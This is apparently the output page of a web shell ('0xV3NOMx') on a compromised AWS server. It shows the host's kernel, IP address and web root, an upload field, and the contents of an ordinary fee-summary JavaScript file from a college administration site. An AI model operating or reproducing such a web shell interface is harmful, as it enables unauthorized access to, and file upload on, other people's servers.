0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.188.130.151


Current Path : /proc/thread-self/root/var/www/oasis/js_old/Report/
Upload File :
Current File : //proc/thread-self/root/var/www/oasis/js_old/Report/fee_summary.js

function Callfeesummary() {
  $("#page_main_div").load(
    "../../html_modules/fee_summary.html?v=3",
    function() {
      document.getElementById("display_module_name").innerHTML = "Fee Summary";
      document.getElementById("module_name_for_save").value = "Fee Summary";
      getDefaultHeadFooterLinks("Fee Summary");
    }
  );
}

function getreport(id, sid) {
  document.getElementById(id).checked = true;
  document.getElementById(sid).checked = false;
}

function Generatefeesummary() {
  var degree_from = $("#degree_from").val();
  var degree_to = $("#degree_to").val();
  var coll_from = $("#coll_from").val();
  var coll_to = $("#coll_to").val();
  var date_from = $("#date_from").val();
  var date_to = $("#date_to").val();
  var reporttype = $("#reporttype").val();
  var report = $("#report").val();
  var collegewise = 0;
  var degreewsie = 0;

  if (reporttype == "") {
    alert("Select Report Type");
    return;
  }
  if (report == "") {
    alert("Select Report");
    return;
  }

  if (document.getElementById("cr").checked == true) collegewise = 1;

  if (document.getElementById("dr").checked == true) degreewsie = 1;

  window.location.href =
    $host_url +
    "Generatefeesummary&degree_from=" +
    degree_from +
    "&degree_to=" +
    degree_to +
    "&reporttype=" +
    reporttype +
    "&coll_from=" +
    coll_from +
    "&coll_to=" +
    coll_to +
    "&date_from=" +
    date_from +
    "&date_to=" +
    date_to +
    "&degreewsie=" +
    degreewsie +
    "&collegewise=" +
    collegewise +
    "&report=" +
    report;
}